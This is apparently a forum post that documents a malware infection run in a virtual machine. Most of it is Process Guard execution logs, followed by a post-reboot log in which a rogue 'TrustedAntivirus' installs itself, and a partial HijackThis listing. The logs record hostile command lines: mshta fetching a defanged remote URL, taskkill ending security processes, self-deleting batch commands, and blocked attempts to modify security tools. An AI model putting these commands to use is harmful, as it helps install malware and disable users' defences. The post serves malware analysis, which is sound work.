[EXECUTION] Started by "c:\windows\system32\mshta.exe" [748]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\rasesnet.exe" ]
Thu 06 - 22:45:22 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\wavvsnet.exe" [2640]
[EXECUTION] Commandline - [ cmd /c ""c:\docume~1\kly\locals~1\temp\un.bat" " ]
Thu 06 - 22:45:28 [EXECUTION] "c:\windows\system32\fb3\rvdll36.exe" was allowed to run
[EXECUTION] Started by "c:\temp\txnog4220.exe" [3112]
[EXECUTION] Commandline - [ c:\windows\system32\fb3\rvdll36.exe ]
Thu 06 - 22:45:37 [EXECUTION] "c:\windows\system32\ev4\philcom3.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\ev4\philcom3.exe" [2372]
[EXECUTION] Commandline - [ c:\windows\system32\ev4\philcom3.exe child ]
Thu 06 - 22:45:50 [EXECUTION] "c:\windows\system32\mshta.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\xpre.exe" [288]
[EXECUTION] Commandline - [ mshta hxxp://snipenet.net/ads/winavp.php ]
Thu 06 - 22:45:57 [EXECUTION] "c:\docume~1\kly\locals~1\temp\mshtml3.exe" was allowed to run
[EXECUTION] Started by "c:\program files\common files\yazzle1281oinadmin.exe" [3320]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\mshtml3.exe" -vt yazb -pid 5 -rid 99001281 ]
Thu 06 - 22:46:09 [EXECUTION] "c:\windows\downloaded program files\uga6p_0001_n122m2802netinstaller.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\mshta.exe" [3452]
[EXECUTION] Commandline - [ "c:\windows\downloaded program files\uga6p_0001_n122m2802netinstaller.exe" /regserver ]
Thu 06 - 22:46:20 [EXECUTION] "c:\docume~1\kly\locals~1\temp\wavvsnet.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\mshta.exe" [3168]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\wavvsnet.exe" ]
Thu 06 - 22:46:26 [EXECUTION] "c:\docume~1\kly\locals~1\temp\wavvsnet.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\mshta.exe" [3992]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\wavvsnet.exe" ]
Thu 06 - 22:46:30 [EXECUTION] "c:\docume~1\kly\locals~1\temp\wavvsnet.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\mshta.exe" [748]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\wavvsnet.exe" ]
Thu 06 - 22:46:37 [EXECUTION] "c:\windows\system32\ax9\np89104.exe" was allowed to run
[EXECUTION] Started by "c:\temp\txnog4220.exe" [3112]
[EXECUTION] Commandline - [ c:\windows\system32\ax9\np89104.exe ]
Thu 06 - 22:46:40 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\rasesnet.exe" [1400]
[EXECUTION] Commandline - [ rundll32.exe ,a ]
Thu 06 - 22:46:43 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\rasesnet.exe" [3932]
[EXECUTION] Commandline - [ rundll32.exe ,a ]
Thu 06 - 22:46:47 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\rasesnet.exe" [3308]
[EXECUTION] Commandline - [ rundll32.exe ,a ]
Thu 06 - 22:46:51 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\xpre.exe" [288]
[EXECUTION] Commandline - [ "c:\windows\system32\cmd.exe" /c start "" "c:\docume~1\kly\locals~1\temp\snapsnet.exe" ]
Thu 06 - 22:46:55 [EXECUTION] "c:\docume~1\kly\locals~1\temp\yazzsnet.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [3168]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\yazzsnet.exe" ]
Thu 06 - 22:46:59 [EXECUTION] "c:\docume~1\kly\locals~1\temp\yazzsnet.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [3992]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\yazzsnet.exe" ]
Thu 06 - 22:47:01 [EXECUTION] "c:\docume~1\kly\locals~1\temp\yazzsnet.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\mshta.exe" [748]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\yazzsnet.exe" ]
Thu 06 - 22:47:04 [EXECUTION] "c:\windows\system32\bv2\renabcom4.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [3112]
[EXECUTION] Commandline - [ c:\windows\system32\bv2\renabcom4.exe ]
Thu 06 - 22:47:05 [EXECUTION] "c:\program files\internet explorer\iexplore.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [788]
[EXECUTION] Commandline - [ "c:\program files\internet explorer\iexplore.exe" -embedding ]
Thu 06 - 22:47:09 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [1400]
[EXECUTION] Commandline - [ cmd /c c:\docume~1\kly\locals~1\temp\removalfile.bat "c:\docume~1\kly\locals~1\temp\rasesnet.exe" ]
Thu 06 - 22:47:13 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [3932]
[EXECUTION] Commandline - [ cmd /c c:\docume~1\kly\locals~1\temp\removalfile.bat "c:\docume~1\kly\locals~1\temp\rasesnet.exe" ]
Thu 06 - 22:47:16 [EXECUTION] "c:\windows\17pholmes572.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\wavvsnet.exe" [1316]
[EXECUTION] Commandline - [ "c:\windows\17pholmes572.exe" 61a847b5bbf728173599284503996897c881250221c8670836ac4fa7c8833201749139 ]
Thu 06 - 22:47:20 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [3308]
[EXECUTION] Commandline - [ cmd /c c:\docume~1\kly\locals~1\temp\removalfile.bat "c:\docume~1\kly\locals~1\temp\rasesnet.exe" ]
Thu 06 - 22:47:26 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\xpre.exe" [288]
[EXECUTION] Commandline - [ "c:\windows\system32\cmd.exe" /c start "" "c:\docume~1\kly\locals~1\temp\rasesnet.exe" ]
Thu 06 - 22:47:50 [EXECUTION] "c:\docume~1\kly\locals~1\temp\snapsnet.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [3616]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\snapsnet.exe" ]
Thu 06 - 22:48:01 [EXECUTION] "c:\program files\common files\yazzle1281oinadmin.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\yazzsnet.exe" [3368]
[EXECUTION] Commandline - [ "c:\program files\common files\yazzle1281oinadmin.exe" -install -name "yazzle1281" -userid 1281 ]
Thu 06 - 22:48:04 [EXECUTION] "c:\program files\common files\yazzle1281oinadmin.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [2320]
[EXECUTION] Commandline - [ "c:\program files\common files\yazzle1281oinadmin.exe" -install -name "yazzle1281" -userid 1281 ]
Thu 06 - 22:48:06 [EXECUTION] "c:\program files\common files\yazzle1281oinadmin.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [3500]
[EXECUTION] Commandline - [ "c:\program files\common files\yazzle1281oinadmin.exe" -install -name "yazzle1281" -userid 1281 ]
Thu 06 - 22:48:12 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\xpre.exe" [288]
[EXECUTION] Commandline - [ "c:\windows\system32\cmd.exe" /c start "" "c:\docume~1\kly\locals~1\temp\wavvsnet.exe" ]
Thu 06 - 22:48:14 [EXECUTION] "c:\docume~1\kly\locals~1\temp\rasesnet.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [3492]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\rasesnet.exe" ]
Thu 06 - 22:48:19 [EXECUTION] "c:\docume~1\kly\locals~1\temp\cmdinst.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\ev4\philcom3.exe" [3772]
[EXECUTION] Commandline - [ c:\docume~1\kly\locals~1\temp\cmdinst.exe /verysilent ]
Thu 06 - 22:48:25 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\wavvsnet.exe" [1316]
[EXECUTION] Commandline - [ cmd /c ""c:\docume~1\kly\locals~1\temp\un.bat" " ]
Thu 06 - 22:48:28 [EXECUTION] "c:\windows\17pholmes1000106.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\fb3\rvdll36.exe" [3736]
[EXECUTION] Commandline - [ "c:\windows\17pholmes1000106.exe" 61a847b5bbf72813329b385772ff01f0b3e35b6638993f4661aa4ebd86d67c56389b284534f310 ]
Thu 06 - 22:48:30 [EXECUTION] "c:\windows\system32\idlo01\idlo011065.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [3508]
[EXECUTION] Commandline - [ c:\windows\system32\idlo01\idlo011065.exe ]
Thu 06 - 22:48:40 [EXECUTION] "c:\docume~1\kly\locals~1\temp\mshtml2.exe" was allowed to run
[EXECUTION] Started by "c:\program files\common files\yazzle1281oinadmin.exe" [2152]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\mshtml2.exe" -vt yazb -pid 5 -rid 99001281 ]
Thu 06 - 22:48:44 [EXECUTION] "c:\docume~1\kly\locals~1\temp\xpre.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\mshta.exe" [3556]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\xpre.exe" ]
Thu 06 - 22:48:55 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\xpre.exe" [288]
[EXECUTION] Commandline - [ "c:\windows\system32\cmd.exe" /c start "" "c:\docume~1\kly\locals~1\temp\winvsnet.exe" ]
Thu 06 - 22:48:58 [EXECUTION] "c:\docume~1\kly\locals~1\temp\wavvsnet.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [2800]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\wavvsnet.exe" ]
Thu 06 - 22:49:05 [EXECUTION] "c:\docume~1\kly\locals~1\temp\is-s20u8.tmp\is-36946.tmp" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\cmdinst.exe" [3080]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\is-s20u8.tmp\is-36946.tmp" /sl4 $190236 "c:\docume~1\kly\locals~1\temp\cmdinst.exe" 542512 52224 /verysilent ]
Thu 06 - 22:49:18 [EXECUTION] "c:\docume~1\kly\locals~1\temp\mshtml3.exe" was allowed to run
[EXECUTION] Started by "c:\program files\common files\yazzle1281oinadmin.exe" [2152]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\mshtml3.exe" -vt yazb -pid 5 -rid 99001281 ]
Thu 06 - 22:49:19 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\rasesnet.exe" [308]
[EXECUTION] Commandline - [ rundll32.exe ,a ]
Thu 06 - 22:49:22 [EXECUTION] "c:\docume~1\kly\locals~1\temp\winvsnet.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [3420]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\winvsnet.exe" ]
Thu 06 - 22:49:25 [EXECUTION] "c:\docume~1\kly\locals~1\temp\snapsnet.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\mshta.exe" [3556]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\snapsnet.exe" ]
Thu 06 - 22:49:28 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\fb3\rvdll36.exe" [3736]
[EXECUTION] Commandline - [ cmd /c ""c:\docume~1\kly\locals~1\temp\un.bat" " ]
Thu 06 - 22:49:31 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [3636]
[EXECUTION] Commandline - [ cmd /c ping localhost -n 3 >> nul && del "c:\docume~1\kly\locals~1\temp\xpre.exe" >> nul ]
Thu 06 - 22:49:35 [EXECUTION] "c:\windows\s0xz\command.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\is-s20u8.tmp\is-36946.tmp" [3392]
[EXECUTION] Commandline - [ "c:\windows\s0xz\command.exe" /install ]
Thu 06 - 22:49:40 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\xpre.exe" [288]
[EXECUTION] Commandline - [ "c:\windows\system32\cmd.exe" /c start "" "c:\docume~1\kly\locals~1\temp\winvsnet.exe" ]
Thu 06 - 22:49:43 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [308]
[EXECUTION] Commandline - [ cmd /c c:\docume~1\kly\locals~1\temp\removalfile.bat "c:\docume~1\kly\locals~1\temp\rasesnet.exe" ]
Thu 06 - 22:49:45 [EXECUTION] "c:\docume~1\kly\locals~1\temp\rasesnet.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\mshta.exe" [3556]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\rasesnet.exe" ]
Thu 06 - 22:49:47 [EXECUTION] "c:\windows\system32\idlo01\idlo011065.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [3268]
[EXECUTION] Commandline - [ c:\windows\system32\idlo01\idlo011065.exe ]
Thu 06 - 22:49:49 [EXECUTION] "c:\windows\system32\ping.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\cmd.exe" [3284]
[EXECUTION] Commandline - [ ping localhost -n 3 ]
Thu 06 - 22:49:52 [EXECUTION] "c:\program files\network monitor\netmon.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [3392]
[EXECUTION] Commandline - [ "c:\program files\network monitor\netmon.exe" qi ]
Thu 06 - 22:49:54 [EXECUTION] "c:\windows\s0xz\command.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [616]
[EXECUTION] Commandline - [ c:\windows\s0xz\command.exe ]
Thu 06 - 22:49:55 [MODIFY] c:\windows\s0xz\command.exe [2404] was blocked from modifying c:\program files\virtual machine additions\vmusrvc.exe [368]
Thu 06 - 22:49:55 [MODIFY] c:\windows\s0xz\command.exe [2404] was blocked from modifying c:\program files\common files\symantec shared\ccapp.exe [428]
Thu 06 - 22:49:55 [MODIFY] c:\windows\s0xz\command.exe [2404] was blocked from modifying c:\program files\processguard\pgaccount.exe [508]
Thu 06 - 22:49:55 [MODIFY] c:\windows\s0xz\command.exe [2404] was blocked from modifying c:\program files\processguard\procguard.exe [872]
Thu 06 - 22:49:55 [MODIFY] c:\windows\s0xz\command.exe [2404] was blocked from modifying c:\program files\ethereal\ethereal.exe [1236]
Thu 06 - 22:49:56 [EXECUTION] "c:\docume~1\kly\locals~1\temp\winvsnet.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [2180]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\winvsnet.exe" ]
Thu 06 - 22:49:58 [EXECUTION] "c:\docume~1\kly\locals~1\temp\wavvsnet.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\mshta.exe" [3556]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\wavvsnet.exe" ]
Thu 06 - 22:50:00 [EXECUTION] "c:\program files\network monitor\netmon.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [616]
[EXECUTION] Commandline - [ "c:\program files\network monitor\netmon.exe" service ]
Thu 06 - 22:50:02 [EXECUTION] "c:\docume~1\kly\locals~1\temp\yazzsnet.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [3556]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\yazzsnet.exe" ]
Thu 06 - 22:50:04 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\program files\network monitor\netmon.exe" [2904]
[EXECUTION] Commandline - [ c:\windows\system32\cmd.exe /u /c ipconfig.exe /displaydns ]
Thu 06 - 22:50:11 [EXECUTION] "c:\program files\common files\yazzle1281oinadmin.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\yazzsnet.exe" [2152]
[EXECUTION] Commandline - [ "c:\program files\common files\yazzle1281oinadmin.exe" -install -name "yazzle1281" -userid 1281 ]
Thu 06 - 22:50:14 [EXECUTION] "c:\windows\system32\ipconfig.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\cmd.exe" [2780]
[EXECUTION] Commandline - [ ipconfig.exe /displaydns ]
Thu 06 - 22:50:14 [EXECUTION] "c:\docume~1\kly\locals~1\temp\mshtml2.exe" was allowed to run
[EXECUTION] Started by "c:\program files\common files\yazzle1281oinadmin.exe" [3832]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\mshtml2.exe" -vt yazb -pid 5 -rid 99001281 ]
Thu 06 - 22:50:18 [EXECUTION] "c:\docume~1\kly\locals~1\temp\mshtml3.exe" was allowed to run
[EXECUTION] Started by "c:\program files\common files\yazzle1281oinadmin.exe" [3832]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\mshtml3.exe" -vt yazb -pid 5 -rid 99001281 ]
Thu 06 - 22:50:25 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\rasesnet.exe" [2244]
[EXECUTION] Commandline - [ rundll32.exe ,a ]
Thu 06 - 22:50:28 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [2244]
[EXECUTION] Commandline - [ cmd /c c:\docume~1\kly\locals~1\temp\removalfile.bat "c:\docume~1\kly\locals~1\temp\rasesnet.exe" ]
Thu 06 - 22:50:46 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\xpre.exe" [288]
[EXECUTION] Commandline - [ cmd /c ping localhost -n 3 >> nul && del "c:\docume~1\kly\locals~1\temp\xpre.exe" >> nul ]
Thu 06 - 22:50:47 [EXECUTION] "c:\windows\system32\ping.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\cmd.exe" [3652]
[EXECUTION] Commandline - [ ping localhost -n 3 ]
Thu 06 - 22:51:45 [EXECUTION] "c:\windows\system32\taskmgr.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\winlogon.exe" [572]
[EXECUTION] Commandline - [ taskmgr.exe ]
Thu 06 - 22:54:44 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\program files\network monitor\netmon.exe" [2904]
[EXECUTION] Commandline - [ c:\windows\system32\cmd.exe /u /c ipconfig.exe /displaydns ]
Thu 06 - 22:54:46 [EXECUTION] "c:\windows\system32\ipconfig.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\cmd.exe" [2772]
[EXECUTION] Commandline - [ ipconfig.exe /displaydns ]

At this point my VM froze ...

After reboot ...
QUOTE
---Process Guard Log Started---

Thu 06 - 22:58:43 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\program files\network monitor\netmon.exe" [1824]
[EXECUTION] Commandline - [ c:\windows\system32\cmd.exe /u /c ipconfig.exe /displaydns ]
Thu 06 - 22:58:48 [EXECUTION] "c:\windows\system32\ipconfig.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\cmd.exe" [1956]
[EXECUTION] Commandline - [ ipconfig.exe /displaydns ]
Thu 06 - 23:01:20 [EXECUTION] "c:\docume~1\kly\locals~1\temp\ni.uga6p_0001_n122m2802\setup.exe" was allowed to run
[EXECUTION] Started by "c:\windows\downloaded program files\uga6p_0001_n122m2802netinstaller.exe" [1832]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\ni.uga6p_0001_n122m2802\setup.exe" /norestart /verysilent /url=trustedantivirus.com /pn=trustedantivirus ]
Thu 06 - 23:01:27 [EXECUTION] "c:\docume~1\kly\locals~1\temp\~uavsetup.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\ni.uga6p_0001_n122m2802\setup.exe" [1744]
[EXECUTION] Commandline - [ c:\docume~1\kly\locals~1\temp\~uavsetup.exe /norestart /verysilent /url=trustedantivirus.com /pn=trustedantivirus /norestart ]
Thu 06 - 23:01:29 [EXECUTION] "c:\docume~1\kly\locals~1\temp\is-vg2du.tmp\is-ebhm2.tmp" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\~uavsetup.exe" [1228]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\is-vg2du.tmp\is-ebhm2.tmp" /sl4 $60136 "c:\docume~1\kly\locals~1\temp\~uavsetup.exe" 15424389 52224 /norestart /verysilent /url=trustedantivirus.com /pn=trustedantivirus /norestart ]
Thu 06 - 23:01:33 [EXECUTION] "c:\docume~1\kly\locals~1\temp\is-2h6n0.tmp\gfl.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\is-vg2du.tmp\is-ebhm2.tmp" [1688]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\is-2h6n0.tmp\gfl.exe" /inireplace ga6plicense.ini ]
Thu 06 - 23:01:40 [EXECUTION] "c:\docume~1\kly\locals~1\temp\is-2h6n0.tmp\xmlreplacer.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\is-vg2du.tmp\is-ebhm2.tmp" [1688]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\is-2h6n0.tmp\xmlreplacer.exe" "c:\docume~1\kly\locals~1\temp\is-2h6n0.tmp\winav.xml" "[name]" "trustedantivirus" ]
Thu 06 - 23:01:52 [EXECUTION] "c:\windows\system32\taskkill.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\is-vg2du.tmp\is-ebhm2.tmp" [1688]
[EXECUTION] Commandline - [ "c:\windows\system32\taskkill.exe" /f /im pgs.exe ]
Thu 06 - 23:01:55 [EXECUTION] "c:\windows\system32\wbem\wmiprvse.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [784]
[EXECUTION] Commandline - [ c:\windows\system32\wbem\wmiprvse.exe -embedding ]
Thu 06 - 23:01:58 [EXECUTION] "c:\windows\system32\taskkill.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\is-vg2du.tmp\is-ebhm2.tmp" [1688]
[EXECUTION] Commandline - [ "c:\windows\system32\taskkill.exe" /f /im fwsvc.exe ]
Thu 06 - 23:02:02 [EXECUTION] "c:\windows\system32\taskkill.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\is-vg2du.tmp\is-ebhm2.tmp" [1688]
[EXECUTION] Commandline - [ "c:\windows\system32\taskkill.exe" /f /im uga6pcw.exe ]
Thu 06 - 23:02:14 [EXECUTION] "c:\docume~1\kly\locals~1\temp\is-2h6n0.tmp\_isetup\_regdll.tmp" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\is-vg2du.tmp\is-ebhm2.tmp" [1688]
[EXECUTION] Commandline - [ _regdll.tmp 448 456 ]
Thu 06 - 23:02:17 [EXECUTION] "c:\docume~1\kly\locals~1\temp\is-2h6n0.tmp\_isetup\_regdll.tmp" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\is-vg2du.tmp\is-ebhm2.tmp" [1688]
[EXECUTION] Commandline - [ _regdll.tmp 448 456 ]
Thu 06 - 23:02:19 [EXECUTION] "c:\docume~1\kly\locals~1\temp\is-2h6n0.tmp\_isetup\_regdll.tmp" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\is-vg2du.tmp\is-ebhm2.tmp" [1688]
[EXECUTION] Commandline - [ _regdll.tmp 448 456 ]
Thu 06 - 23:02:26 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\is-vg2du.tmp\is-ebhm2.tmp" [1688]
[EXECUTION] Commandline - [ "rundll32.exe" "c:\program files\trustedantivirus\dhlp.dll" _install@16 ]
Thu 06 - 23:02:29 [EXECUTION] "c:\program files\trustedantivirus\activate.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\is-vg2du.tmp\is-ebhm2.tmp" [1688]
[EXECUTION] Commandline - [ "c:\program files\trustedantivirus\activate.exe" /"trustedantivirus" ]
Thu 06 - 23:02:31 [EXECUTION] "c:\program files\trustedantivirus\pgs.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\is-vg2du.tmp\is-ebhm2.tmp" [1688]
[EXECUTION] Commandline - [ "c:\program files\trustedantivirus\pgs.exe" /insthelp blpatch trustedantivirus hxxp://trustedantivirus.com/ "c:\program files\trustedantivirus\dat\bnlink.dat" ]
Thu 06 - 23:02:32 [EXECUTION] "c:\program files\trustedantivirus\pgs.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\is-vg2du.tmp\is-ebhm2.tmp" [1688]
[EXECUTION] Commandline - [ "c:\program files\trustedantivirus\pgs.exe" /insthelp sr ?action=23&abbr=uga6p_{pcid}_362.2&pc_id={computer_id}&gai={gai}&gli={gli}&gff={gff}&cnt={cnt}&lng={lng}&lp={lp}&addt={addt} hxxp://ykeeper.trustedantivirus.com/ hxxp://trustedantivirus.com/ trustedantivirus ]
Thu 06 - 23:02:34 [EXECUTION] "c:\program files\common files\trustedantivirus\ugac.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\is-vg2du.tmp\is-ebhm2.tmp" [1688]
[EXECUTION] Commandline - [ "c:\program files\common files\trustedantivirus\ugac.exe" -domain hxxp://trustedantivirus.com ]
Thu 06 - 23:02:36 [EXECUTION] "c:\program files\common files\trustedantivirus\ugac.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\is-vg2du.tmp\is-ebhm2.tmp" [1688]
[EXECUTION] Commandline - [ "c:\program files\common files\trustedantivirus\ugac.exe" -install ]
Thu 06 - 23:02:37 [EXECUTION] "c:\program files\common files\trustedantivirus\ugac.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\is-vg2du.tmp\is-ebhm2.tmp" [1688]
[EXECUTION] Commandline - [ "c:\program files\common files\trustedantivirus\ugac.exe" -start ]
Thu 06 - 23:02:40 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\is-vg2du.tmp\is-ebhm2.tmp" [1688]
[EXECUTION] Commandline - [ "rundll32.exe" "c:\program files\trustedantivirus\dhlp.dll" _install@16 ]
Thu 06 - 23:02:42 [EXECUTION] "c:\program files\common files\trustedantivirus\bm.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\is-vg2du.tmp\is-ebhm2.tmp" [1688]
[EXECUTION] Commandline - [ "c:\program files\common files\trustedantivirus\bm.exe" dm=hxxp://trustedantivirus.com ad=hxxp://trustedantivirus.com sd=hxxp://ykeeper.trustedantivirus.com ]
Thu 06 - 23:02:44 [EXECUTION] "c:\program files\trustedantivirus\pgs.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\is-vg2du.tmp\is-ebhm2.tmp" [1688]
[EXECUTION] Commandline - [ "c:\program files\trustedantivirus\pgs.exe" /quickscan ]
Thu 06 - 23:02:56 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\program files\network monitor\netmon.exe" [1824]
[EXECUTION] Commandline - [ c:\windows\system32\cmd.exe /u /c ipconfig.exe /displaydns ]
Thu 06 - 23:02:58 [EXECUTION] "c:\windows\system32\ipconfig.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\cmd.exe" [1240]
[EXECUTION] Commandline - [ ipconfig.exe /displaydns ]
Thu 06 - 23:03:06 [EXECUTION] "c:\program files\internet explorer\iexplore.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [784]
[EXECUTION] Commandline - [ "c:\program files\internet explorer\iexplore.exe" -embedding ]

In addition to the pile of crap, an antivirus I didn't even ask for, as a bonus ... It detects part of what the infection installed, of course.
QUOTE
Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 11:37:58 PM, on 3/6/2008
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)
Boot mode: Normal

Running processes:
C:\WINDOWS\S0xZ\command.exe
C:\WINDOWS\mrofinu1000106.exe
C:\Program Files\Network Monitor\netmon.exe
C:\Program Files\Common Files\TrustedAntivirus\ugac.exe
C:\Program Files\Common Files\TrustedAntivirus\bm.exe
C:\Program Files\TrustedAntivirus\pgs.exe

